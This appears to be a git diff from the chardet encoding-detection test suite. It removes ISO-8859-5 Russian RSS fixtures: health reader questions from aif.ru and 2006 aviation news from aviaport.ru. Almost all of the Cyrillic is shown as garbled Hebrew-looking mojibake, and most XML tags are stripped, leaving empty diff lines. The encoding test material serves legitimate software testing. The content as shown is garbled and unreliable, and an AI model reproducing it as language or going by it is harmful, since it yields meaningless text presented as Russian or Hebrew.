׃׃.) ¿ױאׂ׀ן ׂבגאױח׀ ב ״ׁ׀גױא״ן״ גדׁױאדױ׳׀ ׂ ְבב״״ ׀ׂן׳כׂ׀ױגבן ״בדבבגׂױ (!) ״ ׀בבׂ ׂ אװװ׀ו. - - - ֱ 3 װ 7 ױג. ְ׀בג״ טױׂױמאד - http://www.aif.ru/online/health/592/06_01 - - "¼ױ װױׂחױ בא 5 ױג. µ דײױ ׁ׀ג״״ ב״גל וחױגבן, וׂבג״״ װױ׀גל ױ ״׳ חױ׃. ¿װב׀ײ״גױ, ׂ חױ ײױג ׁכגל א״ח״׀ ״ ׀״ױ באױװבגׂ׀ ׃דג חל?" -¼. ¼ ױ ח ״ ׂ ׀, ÷בגא׀ - - - ֱ 7 װ 12 ױג. ֵװ״ל״ ׀ מח - http://www.aif.ru/online/health/592/06_02 - - "¼ײ ״ אױװױ״גל, ״בג״ױ ד אױׁױ׀ ײ״אױ״ױ ״״ ױאױױװ׀ױג?" -ֲ. ° ׂ ױ א ״ ׀, µ׀גױא״ׁדא׃ - - - ֱ 12 װ 16 ױג. ¾׀ב׀ן װ׀ - http://www.aif.ru/online/health/592/06_03 - - "ֱ׀ײ״גױ, ׀בל ׀ב וװ״גל ׳״ ב גאכגכ ײ״ׂג. ¼ן װחל ׃ׂא״ג, חג ׀ ׂבױ א״אכׂ׀ױג דאג, ׂבױ א׀ׂ ײױ וװ... ´׀׳׀גל ױ חג-״ׁ ױׂ׳ײ." -². ְ., ֲלןגג״ - - - ¿א׀ׂ״׀ װן ײױדװ׀ - http://www.aif.ru/online/health/592/07_01 - - ¼׃״ױ ױא״װ״חױב״ בגא׀װ׀מג ג ױבׂ׀אױ״ן ײױדװ׀, באׂײװ׀מיױ׃בן ׁױׂכ״ ידיױ״ן״. ¿א״ח״׀ םג׃ ׳׀מח׀ױגבן ױ גל ׂ ג, חג מװ״ ױװןג ױ ג, חג ׀װ, ״ ױ ג׀, ׀ ׀װ, ״ ׁלטױ, חױ ׀װ. ¾בׁױ ח׀בג ג׀׀ן אׁױ׀ ׂ׳״׀ױג בױ א׀׳װ״חכו ׳׀בג״. ַגׁכ ױ װׂװ״גל ײױדװ װ ג׀׃ בבגן״ן, ״גױ ױבל אׂױאױכו ׂאױױױ א׀ׂ״. - - - ½׀בגדױ״ױ ׀ ׀׃״ד - http://www.aif.ru/online/health/592/08_01 - - ÷ װד ״׳ ׀״ׁױױ א׀באבגא׀ױכו אבגדװכו ׳׀ׁױׂ׀״ גב״גבן ׀׃״׀, ״״ בגאכ ג׳״״ג. ֽגד בגאד ״הױז״ד ׳׀ׁױׂ׀״מ ב א׀ײױ״ױ ״װ׀״ (׃׀װ) װׂױאײױכ ׀ װױג״, ג׀ ״ ׂ׳אבכױ. ַ׀יױ ׂבױ׃ ׀׃״׀ ׂ׳״׀ױג ״׳-׳׀ ױאױו׀ײװױ״ן גױ׀ ״״ גװױלכו ױ׃ ח׀בגױ, בׁױ ׃, ׀ הױ ב״ײױ״ן ״ד ׳׀י״גכ א׃׀״׳׀, א״ ױ׀א״ ״ג׀״״, וא״חױב בגאױבבױ, ױאױדגױ״״, ױװבכ׀״״. - - - ²״׀״ױ ׀ ׳ׂח״ - http://www.aif.ru/online/health/592/10_01 - - ¾בגױוװא׳ - װׂל א׀באבגא׀ױױ ׳׀ׁױׂ׀״ױ, גאױ א׀׳ׂ״ׂ׀ױגבן ד מװױ מׁ׃ ׂ׳א׀בג׀. ¿א״חױ ׂ בױװױױ ׂאױן ׂ בׂן׳״ ב ׀װׂ״ײכ ׁא׀׳ ײ״׳״ ״ ׃ח׀בׂכ ב״װױ״ױ ׳׀ למגױא ׳׀ױג װױ. ÷׀ ׀׳׀״ ״בבױװׂ׀״ן, אׂױװױכױ ׂ ¸בג״גדגױ ׀גדא׀ג״״, ׂ אה״׀ג״ױ בגױוװא׳׀ ׀״ׁלט״ םההױג ׀׳כׂ׀מג ׀בב׀ײ, ױחױׁ׀ן ׃״׀בג״׀, ב׀ׂכגןײױ״ױ טױ״ ״ ׳ׂח״׀, װ״ױג׀ ״ ה״גגױא׀״ן. - - - ½ױ ב״ט ״ ײ״א? - http://www.aif.ru/online/health/592/11_02 - - ²כׁ״א׀ן ׀״ׁױױ װוװןי״ױ װן ׂ׀ב ׂ׀א״׀גכ גׂױגׂ ׀ ׀ײװכ ״׳ ׂאבׂ םג׃ גױבג׀, ׂכ בײױגױ ׂ װבג׀גח בגױױ״ ׁךױג״ׂ אױװױ״גל - ׀ ױ "ױאױׁ׀אי״ׂ׀ױגױ" ״ ׂכ ׂ בׂױ ״יױׂ א׀ז״ױ ב ײ״א׀״? - - - ¸׳ױח״ ״ ׀׃״׳? - http://www.aif.ru/online/health/592/12_01 - - "÷׀ ״ װן חױ׃ מװ״ ב׳װ׀מג בױׁױ ׁױ׳״ ״ אׁױכ? ÷׀ חל מװן ״׳ױ״גל בׂמ ײ״׳ל? ¸ ׀ בװױ׀גל ײ״׳ל חױׂױ׀ ׳װאׂ, ב״ל ״ בח׀בג״ׂ?" ¿א׀ג״דמי״ ב״וגױא׀ױׂג, ב״ו׃ ״ ׃ױ׀ג ²׀ױא״ ֱ¸½µ»ּ½¸÷¾² כג׀ױגבן ׀ג״ גׂױגכ ׀ םג״ ׂאבכ... ֱױ׃װן כ דׁ״דױ ׃׀ׂד ״׳ ״׃״ "ֲ׀כ װב׳׀״ן", ׂ גא װגא ֱ״ױל״ׂ ׃׀ױג ןגל א״ח״כ ג׀ ׁױװכ, ׀ ׀׃״׳, ״ ׀׳כׂ׀ױג דגל ״׳ׁ׀ׂױ״ן ג םג ׁױ׳״. - - - ´״ױג׃״ן ׂ ׂאב׀ו ״ גׂױג׀ו - http://www.aif.ru/online/health/592/14_01 - - ֱױ׃װן ׀ ׂאבכ ח״ג׀גױױ גׂױח׀ױג ׂא׀ח-װ״ױג׃, װגא ױװ״ז״ב״ו ׀ד ¼״ו׀״ ³¸½·±ְֳ³. - - - ·׀׀ןױ ׃א - http://www.aif.ru/online/health/592/15_01 - - ² <a href="http://www.aif.ru/online/health/591/04_01">אױװכװדיױ ױאױ</a> כ א׀בב׀׳׀״ ג, ׀ ׂכב״גל דבגח״ׂבגל וװד ׂ׳װדואׂװןי״ו דגױ ב׀, ׀ דײ א׀ׂ״ל װכט׀גל ׀ א׳ױ. ° גױױאל - ױבל בׂױגׂ, ׀ ׳׀׀״גל ׃א. - - - ֱ״׀ױ דגױ״ױ - http://www.aif.ru/online/health/592/16_02 - - "¼ױן חױל דגןמג ױ גל װ״גױלכױ ױ׳װ״ ׂ ׀ׂגׁ״ױ, ״ װ׃״ױ ב״װױ״ן ׀ א׀׳״ח׃ אװ׀ בׂױי׀״ןו ״ בׁא׀״ןו. ¸ ױיױ ׁױב״ג ׁיױױ ״ ױאׂױ ׀אןײױ״ױ, ׀ ׂ בױװױױ ׂאױן - װ׀ײױ ׃ׂכױ ׁ״. ַג ױ ײױג חל?" -¸׃אל ֱ ׂ, ¼בׂ׀ - - - ²׳װדבן ײ״ׂג - http://www.aif.ru/online/health/592/16_04 - - "ַג ײױג א״ ׂ׳װדג״״ ײ״ׂג׀? ַױ ׀װ ״ג׀גלבן?" -µ׀גױא״׀ ¼., ¾אױ - - - ¼ײ ״ ױאױױבגל ׂ״ג׀״ׂ? - http://www.aif.ru/online/health/592/16_06 - - "¾בױלמ ״ ׳״ אױױװדמג ״גל ׁלטױ ׂ״ג׀״ׂ. ֱ׀ײ״גױ, ׀ חױד ײױג א״ׂױבג״ ״ו ױאױ״׳ׁכג?" -². ² ױ ״ ׂ, ִאן׳ױׂ - - - ְ׀ׁג׀ ׀װ ׁא׀׳ - http://www.aif.ru/online/health/592/10_02 - - ½׀ׂױאױ, ױג ג׀ ײױי״כ, גא׀ן ױ וגױ׀ ׁכ ואט ׂכ׃ןװױגל. ¾בׁױ וחױגבן א׀ׁג׀גל ׀װ בׂ״ ׁא׀׳ ױאױװ א׀׳װ״. ½׀בגןיױ ׀ח-ׂכאדח׀ח בג׀דג ׀ב״ ״׳ ׀גדא׀לכו אװדגׂ. - - - - diff --git a/chardet/tests/iso-8859-5-cyrillic/aug32.hole.ru.xml b/chardet/tests/iso-8859-5-cyrillic/aug32.hole.ru.xml deleted file mode 100644 index 35d7d5c..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/aug32.hole.ru.xml +++ /dev/null @@ -1,18 +0,0 @@ - - - - - °ה״ט׀ ֲ° "32-ױ °ׂ׃דבג׀" - http://aug32.hole.ru/ - °ה״ט׀ ֲ° "32-ױ °ׂ׃דבג׀" - - - 18.01.06 - <b>´µִµ÷ֲֻ ְµַ¸</b>. ֱלכ זױאג.<BR><I>ֱ׀ג ¿ױגױאׁדא׃. ÷זױאגכ ׳׀ ״ײ׃ ׀׃׀׳״׀ "±דׂױװ". ½׀ . ²בבג׀״ן.</I> - http://aug32.hole.ru/afisha.htm - - - diff --git a/chardet/tests/iso-8859-5-cyrillic/aviaport.ru.xml b/chardet/tests/iso-8859-5-cyrillic/aviaport.ru.xml deleted file mode 100644 index d800a97..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/aviaport.ru.xml +++ /dev/null @@ -1,221 +0,0 @@ - - - - - - °ׂ״׀¿אג.Ru - http://www.aviaport.ru - °ׂ״׀ז״ן ״ו ױאׂכו אד - - http://www.aviaport.ru/images/aviaport_logo_yandex.gif - °ׂ״׀¿אג.Ru - http://www.aviaport.ru - - - - ½׀װױכ גױ׀ װׂדו ׃״ׁט״ו ׂ ׀ׂ״׀׀ג׀בגאהױ װ ֵ׀אלׂ - http://www.aviaport.ru/news/2006/01/02/99278.html - ½׀ גױאא״גא״״ ֳא׀״כ א׀׳ׁ״בן ב׀ױג ב גאױן חױ׀״ ם״׀ײ׀, ׂכױגױׂט״ ״׳ ¼בׂכ. ֲױ׀ װׂדו ׃״ׁט״ו װןגכ ״׳ ׳ױא׀ ÷בלבױ, דװ׀ ד׀ ב׀ױג - Mon, 02 Jan 2006 17:25:00 +0300 - ½׀ גױאא״גא״״ ֳא׀״כ א׀׳ׁ״בן ב׀ױג ב גאױן חױ׀״ ם״׀ײ׀, ׂכױגױׂט״ ״׳ ¼בׂכ. ֲױ׀ װׂדו ׃״ׁט״ו װןגכ ״׳ ׳ױא׀ ÷בלבױ, דװ׀ ד׀ ב׀ױג. ÷׀ בׁי׀ױג אאױבװױג ׀׃ױגבגׂ׀ "¸גױאה׀ב-ֳא׀״׀", אױװׂ׀א״גױלכ װ׀כ, םג גױ׀ בגמ׀אװױבבכ ״ װ׃ ״׳ ״גׂ. ´ן װךױ׀ ב׀ױג׀ ײ״װ׀מג א״ׁכג״ױ אבב״ב״ו בױז״׀״בגׂ. ÷׀ בׁי״״ "¸גױאה׀בד" ׂ אױבב-בדײׁױ ¼ֱַ ְִ, ׂ ױװױל״ ׂ 11:16 ¼ֱ÷ אױ׀ג״ׂכ ב׀ױג ׁ״׳ױב ׀בב׀ ±׀ױ-125, ׂכױגױׂט״ ״׳ "ָױאױױגלױׂ-1", ד׀ ׂ 3-4 ״ױגא׀ו ױװ׀ױ ג ׀םאאג׀ ֵ׀אלׂ׀. ² ¼ֱַ װׁ׀ׂ״״, חג חױכ ם״׀ײ׀ - ׃א׀ײװ׀ױ ְבב״״. ֱ׀ױג ׳׀אױ׃״בגא״אׂ׀ ׂ בגאׂ ׃בדװ׀אבגׂױ °אדׁ׀. ¸׳ ֵ׀אלׂ׀ װײױ ׁכ װבג׀ׂ״גל גדא״בגׂ ׂ °לכ. ÷ ״בׂכ א׀ׁג׀ א״ׂױחױכ ׀׳ױ׀ן ״בׂ׀ן ׃אד׀ ׀םאאג׀ "ֵ׀אלׂ", װא׀׳װױױ״ױ ױא׀ג״ׂ-ב׀ב׀גױל בדײׁכ ³ֳ ¼״ֱַ ׂ ֵ׀אלׂב ׁ׀בג״, ׂװ׀׳כ. ÷אװ״׀ז״מ ״בׂ-ב׀ב׀גױלכו א׀ׁג בׂױאט׀ױג ֵ׀אלׂב״ אױ׃״׀לכ אװ״׀ז״כ זױגא ³בדװ׀אבגׂױ ׀ׂ״׀ז״ ״בׂ-ב׀ב׀גױל בדײׁכ ¼״ֱַ ֳא׀״כ. - - - - - ¿ג ׀בב׀ײ״אׂ חױאױ׳ ׀םאאג ״ױ״ ±ױ-³דא״׀ ׂכאב ׀ 11% - http://www.aviaport.ru/news/2006/01/02/99277.html - ² 2005- ׃װד חױאױ׳ ׀םאאג ״ױ״ ±ױ-³דא״׀ אט״ א״ױא 8,7 ״״ׂ ׀בב׀ײ״אׂ ױײװד׀אװכו ״ ׀ז״׀לכו ׀ׂ״׀״״. ¿א״אבג בא׀ׂױ״מ ב 2004 ׃װ בבג׀ׂ״ 11% - Mon, 02 Jan 2006 13:29:00 +0300 - ² בױ׃װןטױ ױאױ The Marker (ם״חױבױ א״ײױ״ױ ׃׀׳ױגױ "³׀׀אױז") ׁכ״ דׁ״ׂ׀כ װ׀כױ אבגױ ג׀ ׀בב׀ײ״אׂ חױאױ׳ ׀םאאג ״ױ״ ´׀ׂ״װ׀ ±ױ-³דא״׀.ֱ׃׀ב בׂױװױ״ן, אױװבג׀ׂױכ ׀װ״״בגא׀ז״ױ ׀םאאג׀, ׂ 2005- ׃װד חױאױ׳ ׀םאאג ״ױ״ ±ױ-³דא״׀ אט״ א״ױא 8,7 ״״ׂ ׀בב׀ײ״אׂ ױײװד׀אװכו ״ ׀ז״׀לכו ׀ׂ״׀״״. ¿א״אבג בא׀ׂױ״מ ב 2004 ׃װ בבג׀ׂ״ 11%. ¿א״אבג ׀ ױײװד׀אװכו ׀ׂ״׀״״ןו בבג׀ׂ״ א״ױא 5,3% בא׀ׂױ״מ ב אטכ ׃װ.The Marker דׁ״דױג װ׀כױ ׳׀ גא״ ױװױ״ ״׳ ײ״׳״ ׀םאאג׀: 1-21 װױ׀ׁאן ׀םאאג א״ן א״ױא 360,7 גכבןח ׀בב׀ײ״אׂ, חג ׀ 1,4% ׂכטױ אט׃װױ׃ ׀׳׀גױן ׳׀ ׀׀׃״חכ ױא״װ. ַ״ב א״ׁכׂט״ו ׀בב׀ײ״אׂ ױײװד׀אװכו ׀ׂ״׀״״ בבג׀ׂ״ א״ױא 176 גכבןח (א״אבג ׀ 0,7%), ח״ב ׂכױגױׂט״ו ׀בב׀ײ״אׂ בבג׀ׂ״ 164,5 גכבןח (א״אבג ׀ 2,2%).ַג ׀ב׀ױגבן ׂדגאױ״ו ׀ׂ״׀״״, 1-21 װױ׀ׁאן חױאױ׳ ׀םאאג ״ױ״ ±ױ-³דא״׀ אט״ א״ױא 20,1 גכבןח ׀בב׀ײ״אׂ, חג ׀ 1,7% ׂכטױ ׀׀׃״ח׃ ׀׳׀גױן ׂ אױװכװדיױ ׃װד. ´ׂ״ײױ״ױ ב׀ױגׂ ׀ ׂדגאױ״ו ׀ׂ״׀״״ןו בבג׀ׂ״ 428 ׂ׳ױגׂ ״ ב׀װ (א״אבג ׂ א׀׳ױאױ 3,6%). - - - - - ´ן גדטױ״ן ײ׀אׂ ׂ ֱָ° א״ׂױחױכ ׂױאגױגכ ½׀ז״׀ל ׃ׂ׀אװ״״ - http://www.aviaport.ru/news/2006/01/02/99276.html - ² אןװױ טג׀גׂ ֱָ° ׁדטדמג ױבכױ ײ׀אכ. ´ן ״ׂ״װ׀ז״״ ײ׀אׂ ׳׀װױבגׂדמגבן ׂױאגױגכ ½׀ז״׀ל ׃ׂ׀אװ״״ טג׀ג׀ ֲױו׀ב - Mon, 02 Jan 2006 13:28:00 +0300 - ² אןװױ טג׀גׂ ֱָ° ׁדטדמג ױבכױ ײ׀אכ, בׁי״״ אױװבג׀ׂ״גױ״ ײ׀א בדײׁכ בגא׀כ. ֲ׀, ח׀׃״ ׂ׳׃א׀״ ׳׀אױ׃״בגא״אׂ׀כ ׂ טג׀ג׀ו ¾׀ו׀, ֲױו׀ב ״ ½למ-¼ױב״. ¿א״ םג י׀װל גװױלכו ײ׀אׂ ׀ ׃א׀״זױ ֲױו׀ב ״ ½למ-¼ױב״ װבג״׃׀ױג 20 גכב. ׃׀. ´ן ״ׂ״װ׀ז״״ ײ׀אׂ ׳׀װױבגׂדמגבן ׂױאגױגכ ½׀ז״׀ל ׃ׂ׀אװ״״ טג׀ג׀ ֲױו׀ב. ¾בׂכ״ א״ח״׀״ ױבכו ײ׀אׂ, אװײ׀מי״ובן ב ז׀ װױ׀ׁאן 2005 ׃. ׂ אןװױ מ׃-׳׀׀װכו א׀׀ו ֱָ°, ןׂןמגבן ׳׀בדו׀, ׀׀ל ׂכב׀ן װן םג׃ ׂאױױ״ ׃װ׀ גױױא׀גדא׀ ׂ׳װדו׀ ״ ב״לכ ׂױגױא, ױאױװ׀ױג °ְ. - - - - - ½׀ ׁאגד הא׀זד׳ב׃ ב׀ױג׀ ײױי״׀ אװ״׀ אױׁױ׀ - http://www.aviaport.ru/news/2006/01/02/99275.html - ½׀ ׁאגד ׀בב׀ײ״אב׃ ב׀ױג׀ ׀ׂ״׀׀״״ Air Austral, ױגױׂטױ׃ ״׳ ִא׀ז״״ ׀ בגאׂ ְױמל, ײױי״׀ אװ״׀ אױׁױ׀ - Mon, 02 Jan 2006 13:25:00 +0300 - ½׀ ׁאגד ׀בב׀ײ״אב׃ ב׀ױג׀ ׀ׂ״׀׀״״ Air Austral, ױגױׂטױ׃ ״׳ ִא׀ז״״ ׀ בגאׂ ְױמל, ײױי״׀ אװ״׀ אױׁױ׀. ¼׀לח״׀ ׀׳ׂ׀״ °ל-ִ׀ױװ.ֽג א״׳ט ױיױ ׂ בדׁׁגד. ¿בױ ׂכױג׀ ״׳ »״׀ בגמ׀אװױבב׀ ׳׀ױג״׀, חג ײױי״׀ ב״ט װ׃ ב״װ״ג ׂ גד׀ױגױ. ¾׀ ׃׀ א״ןגל אװכ, ׀ ׀וװ״ׂט״בן ׀ ׁאגד ׂא׀ח ױאױאױ׳׀ דׂ״ד.ֱ׀ ױג אװײ׀בן ןגל ח׀בׂ.¿ א׀ׂ״׀ ׀ׂ״׀ױאױׂ׳, ײױי״כ ב ׁױאױױבגלמ ׁױױ בױ״ ױבןזױׂ ױגד ױ װדב׀מגבן. ֱגאדװ״״ ׀ׂ״׀׀״״ דגׂױאײװ׀מג, חג ׁױאױױבג״ ד םג ײױי״כ ױ ׁכ ׂ״װ. - - - - - ½׀ ׂבגױ °ׂבגא׀״״ ױׁלט ב׀ױג ד׀ ׂ ׂװױ - http://www.aviaport.ru/news/2006/01/02/99274.html - ½׀ ׂבגױ °ׂבגא׀״״ ד׀ ׂ ׂװד ױׁלט װגאכ ב׀ױג, ״ז״ן װגׂױאװ״׀ ׃״ׁױל ןג״ חױׂױ. ½׀ ׁאגד ב׀ױג׀ Cessna-206 ׀וװ״״בל בױל חױׂױ - Mon, 02 Jan 2006 13:24:00 +0300 - ½׀ ׂבגױ °ׂבגא׀״״ ד׀ ׂ ׂװד ױׁלט װגאכ ב׀ױג, ״ז״ן װגׂױאװ״׀ ׃״ׁױל ןג״ חױׂױ, בׁי׀ױג ׀׃ױגבגׂ °בבט״םגױװ ¿אױבב.¿ װ׀כ ״ז״״ טג׀ג׀ ÷ׂ״בױװ, ׃װױ ״ א״׳טױ ״ז״װױג, ׀ ׁאגד ב׀ױג׀ Cessna-206 ׀וװ״״בל בױל חױׂױ - טױבגל ׀בב׀ײ״אׂ-׀א׀טמג״בגׂ ״ ״ג. ´ׂ׀ חױׂױ׀ ׂכײ״״, ״ ׃ב״ג׀״׳״אׂ׀כ, בׁי׀ױג ״ז״ן.ְ׀ױױ בׁי׀בל ׁ װ ׃״ׁטױ.ֱ׀ױג ד׀ ׂ ׂװױ ױװ׀ױ ג ׃אװ׀ ¸בד״ח ׀ ׂבגױ טג׀ג׀ בא׀׳ד ײױ בױ ׂ׳ױג׀. ¿א״ח״כ א״בטױװטױ׃ ׂכןבןמגבן. - - - - - ÷׀״הא״ן: װׂ׀ חױׂױ׀ ׃״ׁ״ ׂ אױ׳דלג׀גױ ׀ׂ״׀׀ג׀בגאהכ - http://www.aviaport.ru/news/2006/01/02/99273.html - ² אױ׳דלג׀גױ אדטױ״ן ׂ ֱָ°, טג׀ג °װ׀ו, ח׀בג׃ אױ׀ג״ׂ׃ ב׀ױג׀ ׃״ׁ״ װׂ׀ חױׂױ׀, ׀וװ״ׂט״ובן ׀ ױ׃ ׁאגד - Mon, 02 Jan 2006 13:23:00 +0300 - County בׁי״ ײדא׀״בג׀ ג, חג ׂ ״דׂטדמ ןג״זד ׂ אױ׳דלג׀גױ אדטױ״ן ח׀בג׃ אױ׀ג״ׂ׃ ב׀ױג׀ ׃״ׁ״ װׂ׀ חױׂױ׀, ׀וװ״ׂט״ובן ׀ ױ׃ ׁאגד. ָױא״ה דגח״, חג ׀ג׀בגאה׀ א״׳ט׀ ׂ 15 ״ױגא׀ו מ׃ד ג ױבג׃ ׀םאאג׀ ֲא׀״, ׂ 14:00 ׂ ןג״זד.ֱדײׁכ ׀םאאג׀ װגׂױאװ״״, חג ב׀ױג ח׀בג ׀״״, ׀ ׁאגד גא׃ ׀וװ״״בל, א׀׳ ״הא׀ז״״, טױבגל ״״ ׂבױל חױׂױ, ׀א׀ׂןבן ׂ ׀םאאג ֲא׀״ ״׳ ֲׂ״-ִ׳, טג׀ג °װ׀ו. ¿ ױׂכןבױכ ׀ א״ח״׀, ׀ט״׀ אױ׳ ״׳ױ״׀ דאב, ׀ ׳׀גױ בׂן׳ל ב ױ א׀׀ ח׀גױל.½׀א׀ׂױכױ ׀ ױבג בױװױ׃ א׀װ״ב״׃׀׀ ב׀ב׀גױ״ ׁ׀אדײ״״ ׃אןי״ױ ׁ״ ב׀ױג׀. ¿׀ ױג גח ״הא׀ז״״ ג, חג א״׳ט ב בג׀לכ״ חױ׀״ ם״׀ײ׀, ״ ׀בב׀ײ״א׀״, ׀וװ״ׂט״״בן ׀ ׁאגד ב׀ױג׀. ² ׀בגןיױױ ׂאױן װ׀ד װױד ׂױװױגבן א׀בבױװׂ׀״ױ. - - - - - ַ״״גל ב׀ױגכ א׀׳אױט״״ ׂבױ ײױ׀מי״ - http://www.aviaport.ru/news/2006/01/02/99272.html - ֱ 1 ןׂ׀אן 2006 ׃װ׀ ׂ ְבב״״ ׂבגד״ ׂ ב״ד ׳׀, גױןמי״ ׁן׳׀גױלױ ״זױ׳״אׂ׀״ױ 50 ׂ״װׂ אױװא״״׀גױלב װױןגױלבג״ - Mon, 02 Jan 2006 13:22:00 +0300 - ֱ 1 ןׂ׀אן 2006 ׃װ׀ ׂ ְבב״״ ׂבגד״ ׂ ב״ד ׳׀, גױןמי״ ׁן׳׀גױלױ ״זױ׳״אׂ׀״ױ 50 ׂ״װׂ אױװא״״׀גױלב װױןגױלבג״, בׁי׀ױג ְ¸° "½ׂבג״". ֽגג ײױ ׳׀ װױ׀ױג ׁן׳׀גױלכ ״זױ׳״אׂ׀״ױ ױבל״ו ׂ״װׂ װױןגױלבג״, װן גאכו א׀ױױ בױז״׀לכו א׀׳אױטױ״ ױ גאױׁׂ׀בל. ² ח׀בגבג״ - ״׃א׃ ׁ״׳ױב׀.ֱ׃׀ב ׂבגד״ׂטױד ׂ ב״ד װדױגד, גױױאל ױ דײ דח׀גל ״זױ׳״מ אױװא״״׀גױן, ׀׳כׂ׀מי״ דבד׃״ ׂ בהױאױ גדא״׳׀. ֲ׀ײױ ״זױ׳״ן ױ ׀װׁ״גבן װן ױאױׂ׳״ ׀בב׀ײ״אׂ ױ׃ׂכ ׀ׂגגא׀באג, א״׳ׂװבגׂ׀ ג׀ׁ׀חכו ״׳װױ״, גױו״חױב׃ ׁבדײ״ׂ׀״ן ׂ׳װדטכו בדװׂ, םבד׀ג׀ז״״ ױהגױװׁכׂ׀מי״ו א״׳ׂװבגׂ ״ גא׀באג׀ ױהג״ ״ ׃׀׳׀.½ױׁוװ״בגל דחױ״ן ״זױ׳״ ׀ װ״ ׂ״װכ װױןגױלבג״ גױןױגבן ב 1 ןׂ׀אן 2006 ׃װ׀, ׀ װאד׃״ױ - ב 1 ןׂ׀אן 2007 ׃װ׀, ׀ װן בג׀לכו ׂ״װׂ אױװא״״׀גױלב װױןגױלבג״ - גל בױ ׂבגדױ״ן ׂ ב״ד בגׂױגבגׂדמי״ו גױו״חױב״ו אױ׃׀ױגׂ.ֲ׀ײױ ׳׀ דאי׀ױג דחױ״ן ״זױ׳״ ״ דגחןױג ח״ן בגׂױגבגׂדמי״ו הױװױא׀לכו א׃׀ׂ ׂ׀בג״. - - - - - ִױװאׂױ װׁױאדג װאןװח״׀ - http://www.aviaport.ru/news/2006/01/02/99271.html - ַ״ׂ״״ א׀ׂ״גױלבגׂ׀ ¾ב ׁ׀בג״ ׀׳ׂדג ׃ױױא׀ל׃ װאןװח״׀ בגא״גױלבגׂ׀ ׂ׃ ׀םאאג׀ ¾ב-ִױװאׂ׀ - Mon, 02 Jan 2006 13:08:00 +0300 - ÷׀ בג׀ ״׳ׂױבג "", בױ׃װן ח״ׂ״״ א׀ׂ״גױלבגׂ׀ ¾ב ׁ׀בג״ ׀׳ׂדג ׃ױױא׀ל׃ װאןװח״׀ בגא״גױלבגׂ׀ ׂ׃ ׀םאאג׀ ¾ב-ִױװאׂ׀. ½ׂכױ ׂ׳װדטכױ ׂאג׀ ¾ב׀, ׀ ׳׀ׂױאטױ״ױ בגא״גױלבגׂ׀ גאכו גאױׁדױגבן ׁױױ 5 אװ אדׁ., ׁדװדג ׂׂױװױכ ׂ םבד׀ג׀ז״מ דײױ ׂ 2008 ׃װד. ·׀ דחױ״ױ ׃ױױא׀ל׃ װאןװ׀, בג״בגל גא׃ גל ׂ בױװדמיױ ׃װד אױׂכב״ג 1 אװ אדׁ., באןג ב״ױ בגא״גױלכױ ׀״״ ¾¾¾ "¿ֱִ "¿ױג ״ ÷" ״ ¾¾¾ "½¿¾ "¼בגׂ״",׀ ג׀ײױ גמױב׀ן ·°¾ "°םאװאװאבגא".³ױױא׀ל׃ װאןװח״׀ בגא״גױלבגׂ׀ ׀םאאג׀ ¾ב-ִױװאׂ׀ בױז״׀ל׀ן דאב׀ן ״בב״ן א׀ׂ״גױלבגׂ׀ ¿א״״אגכטלן אױװױן׀ ׂחױא׀ װ ׳װױ׃ ׂױחױא׀. "² גױװױאױ א״״׀מג דח׀בג״ױ ב״ ה״״׀ גמױב׃ ·°¾ "°םאװאװאבגא", ׀ ג׀ײױ ױבגכױ בגא״גױלכױ ׀״״ ¾¾¾ ¿ֱִ "¿ױג ״ ÷", ״ ¾¾¾ ½¿¾ "¼בגׂ״", - א׀בב׀׳׀ ׀ח׀ל״ דא׀ׂױ״ן ״״בגױאבגׂ׀ אכטױ ״ג״״, גא׀באג׀ ״ בׂן׳״ א׀ׂ״גױלבגׂ׀ ¾ב ׁ׀בג״ °ױב׀װא ¿דט׀אױׂ. ¿ ױ׃ בׂ׀, אױגױװױגכ ׀ דחױ״ױ ׃ױױא׀ל׃ װאןװ׀ װײכ ׁכ״ װ׀׳׀גל, חג ׁ׀װ׀מג ׂבױ״ ױׁוװ״כ״ ׀װאׂכ״ ״ גױו״חױב״״ ׂ׳ײבגן״ װן ׂױװױ״ן בגל ׀בטג׀ׁ בגא״.½׀״, ׁ ׀ג״ׂ דח׀בג״״ ׁ׀בגכו ׂ׀בגױ ׂ בגא״גױלבגׂױ ׂ׃ ׀םאאג׀ ׃דׁױא׀גא »ױ״װ ¿ױײ׀ױׂ ׳׀ןׂ״ 8 װױ׀ׁאן גױדיױ׃ ׃װ׀ ׀ ׳׀בױװ׀״״ ׀או״גױגדא-׃א׀װבגא״גױל׃ בׂױג׀ אױ׃״׀. "7 ןׁאן 2008 ׃װ׀ כ ׂ׳ױג״ ב ׀םאאג׀ ִױװאׂ׀. ½דײ בג׀ׂ״גל ױאױװ בׁ בױאלױ׳כױ ׳׀װ׀ח״", - ׁױי׀ ג׃װ׀ ׃דׁױא׀גא.½׀ בגא״גױלבגׂ ׂ׃ ׀םאאג׀ ׀׳׀ ¿א״״אגכטלן ׂ ׁדװדיױ ׃װד גא׀ג״ג 1 אװ אדׁ. ÷׀ בׁי״ ״. . ״״בגא׀ ה״׀בׂ ¾ב ׁ׀בג״ ¼״ו׀״ ¶װ׀ׂ, א׀בוװכ ׀ ׂ׳ׂױװױ״ױ ׀םאאג׀ ׀ ױ ׳׀ײױכ גװױל בגא ׂ ׁמװײױגױ ¿א״״אגכטלן ׀ 2006 ׃װ. "ֽג׀ בג׀גלן ׁדװױג אה״׀ב״אׂ׀׀ ׳׀ בחױג װ״גױלכו װוװׂ ׀׳כ ״״ ױאױא׀באױװױױ״ן ח׀בג״ א׀בוװׂ ׀ ױא״א״גױגכױ ׳׀װ׀ח״", - בׁי״ ׃בװ״ ¶װ׀ׂ.²׳ׂױװױ״ױ ׂ ¾בױ ׀םאאג׀ ִױװאׂ׀ ׀ח׀בל ׂ 1982 ׃װד. ֱװ׀ח׀ ׁךױג׀ ׂ בגא ׁכ׀ ׳׀׀״אׂ׀׀ ׀ 1993 ׃װ. ¾װ׀ ה״׀ב״אׂ׀״ױ בגא״גױלבגׂ׀ ׁכ אױא׀יױ ׂ ׀ח׀ױ 90-ו ׃װׂ, םגד ׂאױױ״ ׂ׳ױג-ב׀װח׀ן ב׀ ״ ׁךױגכ ״הא׀בגאדגדאכ ׁכ״ ׃גׂכ ׀ 65%. ² ׀בגןי״ ױג ױװבגאױכ ׀םאאג א׀ב׀׃׀ױג ׂ׳ױג ב װ״ 2930 ״ גױל יבגלמ 54 ¼²ג. ÷ ׀םאאגד װׂױװױ ׂװׂװ, םױגאבױג״, ׃׀׳אׂװ ״ ײױױ׳װאײ׀ן 